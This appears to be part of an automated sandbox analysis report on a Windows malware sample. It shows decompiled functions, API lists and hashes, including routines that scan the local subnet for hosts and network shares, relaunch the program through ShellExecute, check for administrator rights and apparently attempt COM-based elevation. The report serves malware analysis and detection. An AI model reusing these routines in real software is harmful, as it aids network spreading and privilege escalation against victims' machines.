Part of subcall function 00CE1AEC: RtlAllocateHeap.NTDLL(00000000,?), ref: 00CE1B04

strlen.NTDLL ref: 00CE36C4
strlen.NTDLL ref: 00CE36EB
strlen.NTDLL ref: 00CE36FB
RtlAllocateHeap.NTDLL(00000008,00000040), ref: 00CE3712
RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00CE37A2
RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00CE37B9

Strings

8e00158debcaa4bdbc0f, xrefs: 00CE36D1
060108efb510c98, xrefs: 00CE36F6, 00CE3770

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$strlen$AllocateFree
String ID: 060108efb510c98$8e00158debcaa4bdbc0f
API String ID: 1462473213-3473940837
Opcode ID: e6dd00f5a11b3b9f4637e2287370a34a9208d32a79a6dfa5999c41ab9f852718
Instruction ID: 54b58ab8a8489df51310216fa6c749b6e93b8befb7aa9734fbb08ae8d54f1c0e
Opcode Fuzzy Hash: e6dd00f5a11b3b9f4637e2287370a34a9208d32a79a6dfa5999c41ab9f852718
Instruction Fuzzy Hash: 483163B1A04249EFDB01DBD2DC49BBF7BB9FB44B05F200125F605A21A2D7722B54DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00CE6FD5, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 92
threadCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00CE6FD5(void* _a4, signed int _a8) {
				intOrPtr _v8;
				long _v12;
				HANDLE* _v16;
				long _v20;
				void* _t25;
				int _t31;
				void* _t40;
				void* _t41;
				intOrPtr _t44;

				E00CE13DA(_t25, 0xcf1048, 0x400);
				_t44 = 0;
				_v8 = 0;
				_v12 = 0xfe;
				asm("bswap ebx");
				_t40 = _a8 & 0xffffff00;
				_v16 = 0xcf1048;
				do {
					asm("bswap ebx");
					if(_t40 != _a8) {
						CreateThread(0, 0, E00CE70DD, _t40, 0, 0);
						asm("stosd");
						_t44 = _t44 + 1;
						if(_t44 == 0x80) {
							WaitForMultipleObjects(0x40, _v16, 1, 0xffffffff);
							WaitForMultipleObjects(0x40, 0xcf0f48, 1, 0xffffffff);
							_v16 = 0xcf1048;
							_v12 = _v12 - 0x80;
							_t44 = 0;
						}
					}
					asm("bswap ebx");
					_t40 = _t40 + 1;
				} while (_t40 != 0xff);
				WaitForMultipleObjects(0x40, _v16, 1, 0xffffffff);
				_v12 = _v12 - 0x40;
				_t31 = WaitForMultipleObjects(_v12,  &(_v16[0x40]), 1, 0xffffffff);
				while(1) {
					asm("lodsd");
					if(_t31 == 0) {
						break;
					}
					_t41 = _t31;
					GetExitCodeThread(_t41,  &_v20);
					if(_v20 != 0 && _v20 != 0x103) {
						asm("stosd");
						_v8 = _v8 + 1;
					}
					_t31 = CloseHandle(_t41);
				}
				return _v8;
			}

0x00ce6fe9
0x00ce6fee
0x00ce6ff0
0x00ce6ff3
0x00ce6ffd
0x00ce6fff
0x00ce700b
0x00ce700e
0x00ce700e
0x00ce7013
0x00ce7023
0x00ce7029
0x00ce702a
0x00ce7031
0x00ce703c
0x00ce704f
0x00ce7055
0x00ce7058
0x00ce705f
0x00ce705f
0x00ce7031
0x00ce7061
0x00ce7063
0x00ce7065
0x00ce7073
0x00ce7079
0x00ce708e
0x00ce709d
0x00ce709d
0x00ce70a0
0x00000000
0x00000000
0x00ce70a4
0x00ce70ab
0x00ce70b5
0x00ce70c3
0x00ce70c4
0x00ce70c4
0x00ce70c8
0x00ce70c8
0x00ce70da

APIs

CreateThread.KERNEL32(00000000,00000000,00CE70DD,?,00000000,00000000), ref: 00CE7023
WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,?,?,?,00000000), ref: 00CE703C
WaitForMultipleObjects.KERNEL32(00000040,00CED4DD,00000001,000000FF,?,?,?,00000000), ref: 00CE704F
WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,00CF1048,00000400,?,?,?,00000000), ref: 00CE7073
WaitForMultipleObjects.KERNEL32(00000040,00CED4DD,00000001,000000FF,?,?,?,00000000), ref: 00CE708E
GetExitCodeThread.KERNEL32(00000000,?,?,?,?,00000000), ref: 00CE70AB
CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00CE70C8

Strings

@, xrefs: 00CE7079

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: MultipleObjectsWait$Thread$CloseCodeCreateExitHandle
String ID: @
API String ID: 2138905869-2766056989
Opcode ID: 43c6827d05f9c04c2836fc25ae58696accf03902599eb0b9f986ff120f82d58c
Instruction ID: 9186eb11337d378cc93370e4aca919c5d7be1d4a52b6bff2d762c4932fb14b9a
Opcode Fuzzy Hash: 43c6827d05f9c04c2836fc25ae58696accf03902599eb0b9f986ff120f82d58c
Instruction Fuzzy Hash: D531A071944249BBEB108BD9CC8AFBEB778EB04B21F248351F635761E1CBB12A44CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00CE7850, Relevance: 10.6, APIs: 7, Instructions: 70
memorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E00CE7850(intOrPtr _a4) {
				wchar_t** _v8;
				char _v12;
				char _v16;
				long _v20;
				char _v420;
				void* _t32;
				intOrPtr _t33;
				wchar_t** _t34;
				void* _t35;

				 *0xcf0f52(0x101,  &_v420);
				_v20 = 0;
				_t33 = _a4;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				_push(0xffffffff);
				_push( &_v8);
				_push(1);
				_push(_t33);
				if( *0xcf0f4e() == 0) {
					_t34 = _v8;
					do {
						if(_t34[1] == 0) {
							_t32 = RtlAllocateHeap( *0xcf0a9e, 8, 0x10000);
							 *_t32 = 0x5c005c;
							 *((intOrPtr*)(_t32 + 4)) = 0x5c003f;
							 *((intOrPtr*)(_t32 + 8)) = 0x4e0055;
							 *((intOrPtr*)(_t32 + 0xc)) = 0x5c0043;
							_t13 = _t33 + 4; // 0xce7ca3
							wcscat(_t32, _t13);
							PathAddBackslashW(_t32);
							wcscat(_t32,  *_t34);
							_t35 = _t35 + 0x10;
							E00CE6B07(_t32);
							RtlFreeHeap( *0xcf0a9e, 0, _t32);
						}
						_t34 =  &(_t34[3]);
						_v12 = _v12 - 1;
					} while (_v12 != 0);
				}
				return  *0xcf0f56();
			}

0x00ce786a
0x00ce7870
0x00ce7877
0x00ce787d
0x00ce7881
0x00ce7885
0x00ce7886
0x00ce788b
0x00ce788c
0x00ce788e
0x00ce7897
0x00ce7899
0x00ce789c
0x00ce78a0
0x00ce78b5
0x00ce78b7
0x00ce78bd
0x00ce78c4
0x00ce78cb
0x00ce78d2
0x00ce78d7
0x00ce78e1
0x00ce78ea
0x00ce78f0
0x00ce78f4
0x00ce7902
0x00ce7902
0x00ce7908
0x00ce790b
0x00ce790e
0x00ce789c
0x00ce7922

APIs

WSAStartup.WS2_32(00000101,?), ref: 00CE786A
RtlAllocateHeap.NTDLL(00000008,00010000), ref: 00CE78AF
wcscat.NTDLL ref: 00CE78D7
PathAddBackslashW.SHLWAPI(00000000,?,00000000), ref: 00CE78E1
wcscat.NTDLL ref: 00CE78EA

Part of subcall function 00CE6B07: GetDiskFreeSpaceExW.KERNEL32(00CE6F02,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00CE6B20

RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00CE7902
WSACleanup.WS2_32 ref: 00CE7914

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeapwcscat$AllocateBackslashCleanupDiskPathSpaceStartup
String ID:
API String ID: 1862907633-0
Opcode ID: ab3040a1917dbe13b2bb1f364f3ed23ab0a0c7a500a37e694e6f2054b509a52f
Instruction ID: 7a9db7f171993ee7b5e87c547879d040240b1f493b77dbdc699284ef5a0a0158
Opcode Fuzzy Hash: ab3040a1917dbe13b2bb1f364f3ed23ab0a0c7a500a37e694e6f2054b509a52f
Instruction Fuzzy Hash: 632149B1500208EFDB10DF90EC88FBEBBBDFB04711F204169F919A6192D7B56A54CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00CE7D5B, Relevance: 10.6, APIs: 7, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE7D5B() {
				long _v524;
				short _v1044;
				short _v1564;
				short _v2084;

				GetModuleFileNameW( *0xcf0aa2,  &_v2084, 0x104);
				GetShortPathNameW( &_v2084,  &_v524, 0x104);
				E00CE16D5(0xceaf30,  *0x00CEAF2C);
				E00CE13DA(wcscpy( &_v1044, 0xceaf30), 0xceaf30,  *((intOrPtr*)(0xceaf2c)));
				wcscat( &_v1044,  &_v524);
				E00CE16D5(0xceaf50,  *0x00CEAF4C);
				E00CE13DA(wcscat( &_v1044, 0xceaf50), 0xceaf50,  *((intOrPtr*)(0xceaf4c)));
				E00CE16D5(0xceaf64,  *0x00CEAF60);
				E00CE13DA(GetEnvironmentVariableW(0xceaf64,  &_v1564, 0x104), 0xceaf64,  *((intOrPtr*)(0xceaf60)));
				return ShellExecuteW(0, 0,  &_v1564,  &_v1044, 0, 0);
			}

0x00ce7d76
0x00ce7d8f
0x00ce7d9f
0x00ce7db9
0x00ce7dcc
0x00ce7ddf
0x00ce7df9
0x00ce7e08
0x00ce7e24
0x00ce7e48

APIs

GetModuleFileNameW.KERNEL32(?,00000104), ref: 00CE7D76
GetShortPathNameW.KERNEL32(?,?,00000104), ref: 00CE7D8F
wcscpy.NTDLL ref: 00CE7DAC
wcscat.NTDLL ref: 00CE7DCC
wcscat.NTDLL ref: 00CE7DEC
GetEnvironmentVariableW.KERNEL32(00000000,?,00000104,00000000,00000002,00000000,00000002), ref: 00CE7E1A
ShellExecuteW.SHELL32(00000000,00000000,?,?,00000000,00000000), ref: 00CE7E3F

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Namewcscat$EnvironmentExecuteFileModulePathShellShortVariablewcscpy
String ID:
API String ID: 1871371215-0
Opcode ID: cce2f297db1fbe91c0cfcbf65a67e19e2839215a7decc9b2527c68300c9cc305
Instruction ID: edb7f14dd6f2437c192b0d008fdb8b7a4caa0d1e878faf1b39a2653bff3d7db0
Opcode Fuzzy Hash: cce2f297db1fbe91c0cfcbf65a67e19e2839215a7decc9b2527c68300c9cc305
Instruction Fuzzy Hash: 1C2145B2440208AFCB10EBE1DDC9FEEB73CBB08705F140491B74595062DB716694DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00CE70DD, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46memorynetworkCOMMON

Download Yara Rule

APIs

SendARP.IPHLPAPI(00000006,00000000,?,00000006), ref: 00CE70FE
gethostbyaddr.WS2_32(00000006,00000004,00000002), ref: 00CE7110
sprintf.NTDLL ref: 00CE7125
RtlAllocateHeap.NTDLL(00000008), ref: 00CE7140
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CE7157

Strings

\\%s\, xrefs: 00CE711C

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateByteCharHeapMultiSendWidegethostbyaddrsprintf
String ID: \\%s\
API String ID: 1003103942-3797145132
Opcode ID: d60aa61218124e83d2d82a1feb1236c3d3e9e9de3860ef6305cafa00bd684505
Instruction ID: cc2d3206f386302b62c26325ff9748cd1336980a9f238fcd4b6413f25836bd62
Opcode Fuzzy Hash: d60aa61218124e83d2d82a1feb1236c3d3e9e9de3860ef6305cafa00bd684505
Instruction Fuzzy Hash: 24014071640208BBDB10DFD0DC49FEE7B78EB09B40F200265FA04E62A1E771AA14DB95

Uniqueness

Uniqueness Score: -1.00%

Function 00CE7166, Relevance: 9.1, APIs: 6, Instructions: 113
memoryCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E00CE7166(intOrPtr _a4, void** _a8) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				void* _t58;

				_v8 = 0;
				 *0xcf0ebe(0);
				_v24 = 0;
				_v28 = 0;
				_v12 = E00CE1AEC(0xceb01a);
				_v16 = E00CE1AEC(0xceb02e);
				_v20 = E00CE1AEC(0xceb042);
				_push( &_v24);
				_push(_v16);
				_push(1);
				_push(0);
				_push(_v12);
				if( *0xcf0ece() == 0) {
					_push( &_v28);
					_push(_v20);
					_push(_v24);
					if( *((intOrPtr*)( *_v24))() == 0) {
						_push(0);
						_push(_a4);
						_push(_v28);
						if( *((intOrPtr*)( *_v28 + 0x14))() == 0) {
							_t58 = RtlAllocateHeap( *0xcf0a9e, 0, 0x208);
							if(_t58 != 0) {
								_push(0);
								_push(0);
								_push(0x104);
								_push(_t58);
								_push(_v24);
								if( *((intOrPtr*)( *_v24 + 0xc))() != 0) {
									RtlFreeHeap( *0xcf0a9e, 0, _t58);
								} else {
									 *_a8 = _t58;
									_v8 = 1;
								}
							}
						}
					}
				}
				if(_v12 != 0) {
					RtlFreeHeap( *0xcf0a9e, 0, _v12);
				}
				if(_v16 != 0) {
					RtlFreeHeap( *0xcf0a9e, 0, _v16);
				}
				if(_v20 != 0) {
					RtlFreeHeap( *0xcf0a9e, 0, _v20);
				}
				if(_v28 != 0) {
					 *((intOrPtr*)( *_v28 + 8))(_v28);
				}
				if(_v24 != 0) {
					 *((intOrPtr*)( *_v24 + 8))(_v24);
				}
				 *0xcf0ec2();
				return _v8;
			}

0x00ce7171
0x00ce717a
0x00ce7180
0x00ce7187
0x00ce7198
0x00ce71a5
0x00ce71b2
0x00ce71b8
0x00ce71b9
0x00ce71bc
0x00ce71be
0x00ce71c0
0x00ce71cb
0x00ce71d5
0x00ce71d6
0x00ce71d9
0x00ce71e0
0x00ce71e7
0x00ce71e9
0x00ce71ec
0x00ce71f4
0x00ce7209
0x00ce720d
0x00ce7214
0x00ce7216
0x00ce7218
0x00ce721d
0x00ce721e
0x00ce7226
0x00ce723f
0x00ce7228
0x00ce722b
0x00ce722d
0x00ce722d
0x00ce7226
0x00ce720d
0x00ce71f4
0x00ce71e0
0x00ce7249
0x00ce7256
0x00ce7256
0x00ce7260
0x00ce726d
0x00ce726d
0x00ce7277
0x00ce7284
0x00ce7284
0x00ce728e
0x00ce7298
0x00ce7298
0x00ce729f
0x00ce72a9
0x00ce72a9
0x00ce72ac
0x00ce72bd

APIs

CoInitialize.OLE32(00000000), ref: 00CE717A

Part of subcall function 00CE1AEC: RtlAllocateHeap.NTDLL(00000000,?), ref: 00CE1B04

RtlAllocateHeap.NTDLL(00000000,00000208), ref: 00CE7203
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE723F
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE7256
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE726D
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE7284

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$Allocate$Initialize
String ID:
API String ID: 1640397549-0
Opcode ID: 4c253c567264883c1b4dac013a2bf3f0cf118e486d46e52d0f80e6f7af62a872
Instruction ID: 2f4208a2b2bcc435b8b206ebdc27ae513fc9a310809bfd7abe75053db1321059
Opcode Fuzzy Hash: 4c253c567264883c1b4dac013a2bf3f0cf118e486d46e52d0f80e6f7af62a872
Instruction Fuzzy Hash: 2B41FA74A0024AEFEB119F92DC49BBEBB76FF04705F204164F610A61A1D7716E90DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00CE4966, Relevance: 9.1, APIs: 6, Instructions: 72
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00CE4966() {
				void* _v8;
				long _v12;
				void _v16;
				int _t29;
				void _t30;
				int _t31;
				void _t32;

				_t30 = 0;
				_v16 = 0;
				if(OpenProcessToken(0xffffffff, 8,  &_v8) != 0) {
					GetTokenInformation(_v8, 2,  &_v16, 4,  &_v12);
					_v16 = RtlAllocateHeap( *0xcf0a9e, 8, _v12);
					_t29 = GetTokenInformation(_v8, 2, _v16, _v12,  &_v12);
					if(_t29 != 0) {
						_t32 = _v16;
						asm("lodsd");
						_t31 = _t29;
						while(1) {
							asm("lodsd");
							if( *((intOrPtr*)(_t29 + 8)) == 0x20 &&  *((intOrPtr*)(_t29 + 0xc)) == 0x220) {
								break;
							}
							_t32 = _t32 + 4;
							_t31 = _t31 - 1;
							if(_t31 != 0) {
								continue;
							}
							goto L7;
						}
						_t30 = 1;
					}
				}
				L7:
				if(_v16 != 0) {
					RtlFreeHeap( *0xcf0a9e, 0, _v16);
				}
				if(_v8 != 0) {
					CloseHandle(_v8);
				}
				return _t30;
			}

0x00ce4971
0x00ce4973
0x00ce4986
0x00ce4997
0x00ce49ae
0x00ce49c0
0x00ce49c8
0x00ce49ca
0x00ce49cd
0x00ce49ce
0x00ce49d0
0x00ce49d0
0x00ce49d5
0x00000000
0x00000000
0x00ce49e7
0x00ce49ea
0x00ce49ed
0x00000000
0x00000000
0x00000000
0x00ce49ed
0x00ce49e0
0x00ce49e0
0x00ce49c8
0x00ce49ef
0x00ce49f3
0x00ce4a00
0x00ce4a00
0x00ce4a0a
0x00ce4a0f
0x00ce4a0f
0x00ce4a1f

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,00000010), ref: 00CE497E
GetTokenInformation.ADVAPI32(00000010,00000002,00CED4CD,00000004,00CED4DD), ref: 00CE4997
RtlAllocateHeap.NTDLL(00000008,00CED4DD), ref: 00CE49A8
GetTokenInformation.ADVAPI32(00000010,00000002,00CED4CD,00CED4DD,00CED4DD), ref: 00CE49C0
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE4A00
CloseHandle.KERNEL32(00000000), ref: 00CE4A0F

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$HeapInformation$AllocateCloseFreeHandleOpenProcess
String ID:
API String ID: 2560936520-0
Opcode ID: 413a77cee8e62f8973a4a5213932d1ce295452a2af774f9bc7207d653a8a2f03
Instruction ID: 0d89b0083fbd6c9232c138f52b01cfd2c034d02e8a57f8e9a33848a7202f96cc
Opcode Fuzzy Hash: 413a77cee8e62f8973a4a5213932d1ce295452a2af774f9bc7207d653a8a2f03
Instruction Fuzzy Hash: 14216F76A00108FFEF118FC2DC49FAEB7B9EB04721F2041A5E525A21A2D7715F44DB11

Uniqueness

Uniqueness Score: -1.00%

Function 00CE39EA, Relevance: 7.6, APIs: 5, Instructions: 56
memoryCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E00CE39EA() {
				int _v8;
				long _v12;
				void* _t15;
				void* _t27;
				wchar_t* _t32;
				wchar_t* _t33;

				_t15 =  *0xcf0ebe(0);
				if(_t15 == 0x54f) {
					return _t15;
				}
				E00CE380C();
				_v12 = 0;
				E00CE391C( &_v12);
				if(_v12 != 0) {
					_t32 = GetCommandLineW();
					_t27 = CommandLineToArgvW(_t32,  &_v8);
					if(_v8 != 1) {
						_t33 = wcsstr(_t32,  *(_t27 + 4));
						if( *((short*)(_t33 - 2)) != 0x20) {
							_t33 = _t33 - 2;
						}
					} else {
						_t33 = 0;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(_t33);
					_push( *_t27);
					_push(_v12);
					if( *((intOrPtr*)( *_v12 + 0x24))() == 0) {
						 *((intOrPtr*)( *_v12 + 8))(_v12);
					}
					RtlFreeHeap( *0xcf0a9e, 0, _t27);
				}
				return  *0xcf0ec2();
			}

0x00ce39f2
0x00ce39fd
0x00ce3a91
0x00ce3a91
0x00ce3a03
0x00ce3a08
0x00ce3a13
0x00ce3a1c
0x00ce3a24
0x00ce3a31
0x00ce3a37
0x00ce3a4a
0x00ce3a51
0x00ce3a53
0x00ce3a53
0x00ce3a39
0x00ce3a39
0x00ce3a39
0x00ce3a5b
0x00ce3a5d
0x00ce3a5f
0x00ce3a61
0x00ce3a62
0x00ce3a64
0x00ce3a6c
0x00ce3a76
0x00ce3a76
0x00ce3a82
0x00ce3a82
0x00000000

APIs

CoInitialize.OLE32(00000000), ref: 00CE39F2

Part of subcall function 00CE380C: GetWindowsDirectoryW.KERNEL32(?,00000104,?,00000208), ref: 00CE383E
Part of subcall function 00CE380C: wcscat.NTDLL ref: 00CE3850
Part of subcall function 00CE380C: wcscat.NTDLL ref: 00CE3870
Part of subcall function 00CE380C: NtAllocateVirtualMemory.NTDLL(000000FF,00CF101C,00000000,00001000,00003000,00000004), ref: 00CE3894
Part of subcall function 00CE380C: wcscpy.NTDLL ref: 00CE38B0
Part of subcall function 00CE380C: RtlEnterCriticalSection.NTDLL(?), ref: 00CE38BC
Part of subcall function 00CE380C: RtlInitUnicodeString.NTDLL(?), ref: 00CE38CF
Part of subcall function 00CE380C: RtlInitUnicodeString.NTDLL(?,?), ref: 00CE38E3
Part of subcall function 00CE380C: RtlLeaveCriticalSection.NTDLL(?), ref: 00CE38EC
Part of subcall function 00CE380C: LdrEnumerateLoadedModules.NTDLL(00000000,00CE37C8,00000000), ref: 00CE38FA

Part of subcall function 00CE391C: wcscpy.NTDLL ref: 00CE3952
Part of subcall function 00CE391C: wcscat.NTDLL ref: 00CE397B
Part of subcall function 00CE391C: CoGetObject.OLE32(?,00000024,?,00CE3A18), ref: 00CE39D0

GetCommandLineW.KERNEL32(00000000), ref: 00CE3A1E
CommandLineToArgvW.SHELL32(00000000,00000010), ref: 00CE3A2B
wcsstr.NTDLL ref: 00CE3A41
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE3A82

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$CommandCriticalInitLineSectionStringUnicodewcscpy$AllocateArgvDirectoryEnterEnumerateFreeHeapInitializeLeaveLoadedMemoryModulesObjectVirtualWindowswcsstr
String ID:
API String ID: 2898426887-0
Opcode ID: 65a998f23c38f876ceadc51831f5627d25a853d328e136b9b8bac5bf82632f2d
Instruction ID: e9d02a4b64ff4dd2dab03102283f176751a8ac31b18b80a09dce5df9e6512821
Opcode Fuzzy Hash: 65a998f23c38f876ceadc51831f5627d25a853d328e136b9b8bac5bf82632f2d
Instruction Fuzzy Hash: 15119431A00254EBDB209FE1CC4DB9EBB75EF05701F204160E944A71A1D7716FD0DB96

Uniqueness

Uniqueness Score: -1.00%

Function 00CE1E10, Relevance: 7.6, APIs: 5, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE1E10(char* _a4, long _a8, intOrPtr _a12) {
				void* _t19;
				short _t22;
				short _t23;
				short _t24;

				if(_a8 == 0) {
					return 0;
				} else {
					if(_a12 == 0) {
						E00CE13DA(_t19, 0xcf1008, 0x10);
					}
					_t22 = RtlComputeCrc32(RtlComputeCrc32(0xdeadbeef, _a4, _a8), _a4, _a8);
					 *0xcf1008 =  *0xcf1008 ^ _t22;
					_t23 = RtlComputeCrc32(_t22, _a4, _a8);
					 *0x00CF100C =  *0x00CF100C ^ _t23;
					_t24 = RtlComputeCrc32(_t23, _a4, _a8);
					 *0x00CF1010 =  *0x00CF1010 ^ _t24;
					 *0x00CF1014 =  *0x00CF1014 ^ RtlComputeCrc32(_t24, _a4, _a8);
					return 0xcf1008;
				}
			}

0x00ce1e1c
0x00ce1e9b
0x00ce1e1e
0x00ce1e28
0x00ce1e2d
0x00ce1e2d
0x00ce1e4a
0x00ce1e50
0x00ce1e59
0x00ce1e5f
0x00ce1e69
0x00ce1e6f
0x00ce1e7f
0x00ce1e8d
0x00ce1e8d

APIs

RtlComputeCrc32.NTDLL(DEADBEEF,?,00000000), ref: 00CE1E3D
RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 00CE1E4A
RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 00CE1E59
RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 00CE1E69
RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 00CE1E79

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: ComputeCrc32
String ID:
API String ID: 660108262-0
